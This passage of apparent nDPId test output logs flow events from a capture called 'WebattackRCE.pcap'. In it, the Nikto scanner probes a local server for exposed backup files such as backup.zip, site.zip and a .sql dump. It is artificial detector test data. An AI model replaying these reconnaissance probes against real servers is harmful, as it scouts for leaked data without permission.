Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_packet_id":1,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276982,"pkt":"AAAAAAAAAAAAAAAACABFAAC98llAAEAGSd9\/AAABfwAAAcMWH5DjKcoLls+qsoAYAED+sQAAAQEICp1m\/B6dZvwdR0VUIC8xLmFseiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":199,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276982,"flow_last_seen":1576420276982,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276982,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49942,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_packet_id":1,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420276983,"pkt":"AAAAAAAAAAAAAAAACABFAAC9nNlAAEAGn19\/AAABfwAAAcMYH5CM06SLK3vm\/IAYAED+sQAAAQEICp1m\/B+dZvwfR0VUIC8xLmFseiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":200,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":200,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276983,"flow_last_seen":1576420276983,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420276983,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49944,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.alz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_packet_id":1,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276985,"pkt":"AAAAAAAAAAAAAAAACABFAADCh5hAAEAGtJt\/AAABfwAAAcMaH5DK+b\/J7Nxpa4AYAED+tgAAAQEICp1m\/CGdZvwgR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":201,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276985,"flow_last_seen":1576420276985,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276985,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49946,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420276986,"pkt":"AAAAAAAAAAAAAAAACABFAADC6rNAAEAGUYB\/AAABfwAAAcMcH5BJJNLw4gK1PYAYAED+tgAAAQEICp1m\/CKdZvwiR0VUIC9iYWNrdXAuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":202,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276986,"flow_last_seen":1576420276986,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420276986,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49948,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/backup.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_packet_id":1,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276987,"pkt":"AAAAAAAAAAAAAAAACABFAADABtBAAEAGNWZ\/AAABfwAAAcMeH5DVkj6SMBYRsYAYAED+tAAAAQEICp1m\/COdZvwjR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":203,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276987,"flow_last_seen":1576420276987,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276987,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49950,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_packet_id":1,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276989,"pkt":"AAAAAAAAAAAAAAAACABFAADAb4pAAEAGzKt\/AAABfwAAAcMgH5DktVfY9BOJ1YAYAED+tAAAAQEICp1m\/CWdZvwlR0VUIC9zaXRlLnppcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":204,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276989,"flow_last_seen":1576420276989,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276989,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49952,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_packet_id":1,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276990,"pkt":"AAAAAAAAAAAAAAAACABFAADGkTtAAEAGqvR\/AAABfwAAAcMiH5BqAalni+2D0IAYAED+ugAAAQEICp1m\/CadZvwmR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":205,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":205,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276990,"flow_last_seen":1576420276990,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276990,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49954,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_packet_id":1,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276992,"pkt":"AAAAAAAAAAAAAAAACABFAADGaPFAAEAG0z5\/AAABfwAAAcMkH5B8x1CQWvOvzIAYAED+ugAAAQEICp1m\/CidZvwoR0VUIC8xMjcuMC4wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":206,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":206,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276992,"flow_last_seen":1576420276992,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276992,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49956,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 
+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_packet_id":1,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276993,"pkt":"AAAAAAAAAAAAAAAACABFAADFOFRAAEAGA91\/AAABfwAAAcMmH5DTogAzSwYGfYAYAED+uQAAAQEICp1m\/CmdZvwpR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":207,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276993,"flow_last_seen":1576420276993,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276993,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49958,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_packet_id":1,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276995,"pkt":"AAAAAAAAAAAAAAAACABFAADFLPBAAEAGD0F\/AAABfwAAAcMoH5DgsBSPBaIHeIAYAED+uQAAAQEICp1m\/CudZvwrR0VUIC8xMjdfMF8wXzEudGd6IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":208,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":208,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276995,"flow_last_seen":1576420276995,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276995,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49960,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tgz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_packet_id":1,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":209,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":209,"pkt_l4_len":175,"thread_ts_msec":1576420276996,"pkt":"AAAAAAAAAAAAAAAACABFAADD0zFAAEAGaQF\/AAABfwAAAcMqH5Dy3etP7K3wrYAYAED+twAAAQEICp1m\/CydZvwsR0VUIC8xMjcuMC4wLnNxbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":209,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":209,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276996,"flow_last_seen":1576420276996,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420276996,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49962,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": 